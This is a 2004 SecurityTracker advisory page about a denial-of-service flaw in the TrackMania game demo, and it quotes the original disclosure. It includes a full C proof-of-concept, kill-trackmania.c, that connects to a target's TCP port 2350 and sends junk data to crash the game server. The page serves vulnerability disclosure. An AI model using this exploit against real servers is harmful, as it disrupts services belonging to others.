SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   TrackMania Vendors:   Nadeo
TrackMania Game Demo Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1008983
SecurityTracker URL:  http://securitytracker.com/id/1008983
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 9 2004
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   Arnaud Jacques (scrap) from Securiteinfo.com reported a denial of service vulnerability in the TrackMania game in the demo version. A remote user can cause the game to crash.

It is reported that a remote user can send some 'garbage' data to TCP port 2350 on the target server to cause the multiplayer game server to crash.

A demonstration exploit script is provided in the Source Message and at:

http://www.securiteinfo.com/download/kill-trackmania.c

The vendor has reportedly been notified.

The original advisory is available at:

http://www.securiteinfo.com/attaques/hacking/trackmaniados.shtml

Impact:   A remote user can cause the game server to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.trackmania.com/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  TrackMania Demo Denial of Service


TrackMania Demo Denial of Service
The original document can be found at
http://www.securiteinfo.com/attaques/hacking/trackmaniados.shtml


.oO  Overview Oo.
TrackMania Demo Denial of Service
Discovered on 2003, November, 30th
Vendor: TrackMania Official website http://www.trackmania.com

TrackMania is a "Stunt Car Racer" like game. The multiplayer demo of this game
is subject to denial of service.


.oO  Details Oo.
The multiplayer game use TCP port 2350 to communicate. If you send some
garbage to this port, it will shutdown the game server.


.oO  Exploit Oo.
Here is the proof of concept :

/*
* [kill-trackmania.c]
* A remote DoS that affects the Trackmania game server
*
* by Scrap
* webmaster@securiteinfo.com
* http://www.securiteinfo.com
*
* gcc kill-trackmania.c -o kill-trackmania -O2
*
*/

#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
int sock;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
char buffer[1024];
unsigned long counter;

printf("\n [kill-trackmania.c] by Scrap / Securiteinfo.com\n");

if (argc<2)

{
printf("Usage: %s target\n\n",argv[0]);
exit(0);
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}

start=inet_addr(argv[1]);
counter=ntohl(start);

sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(2350);

if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
exit(0);
}
printf("\n\t Sending Bomb... \n");
send(sock, "Bomb from Securiteinfo.com\n\n",17,0);
close(sock);

printf("\t Bomb sent...\n");

}

Download kill-trackmania.c at
http://www.securiteinfo.com/download/kill-trackmania.c


.oO  Solution Oo.
The vendor has been informed and has not solved the problem.


.oO  Discovered by Oo.
Arnaud Jacques aka scrap
webmaster@securiteinfo.com
http://www.securiteinfo.com


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC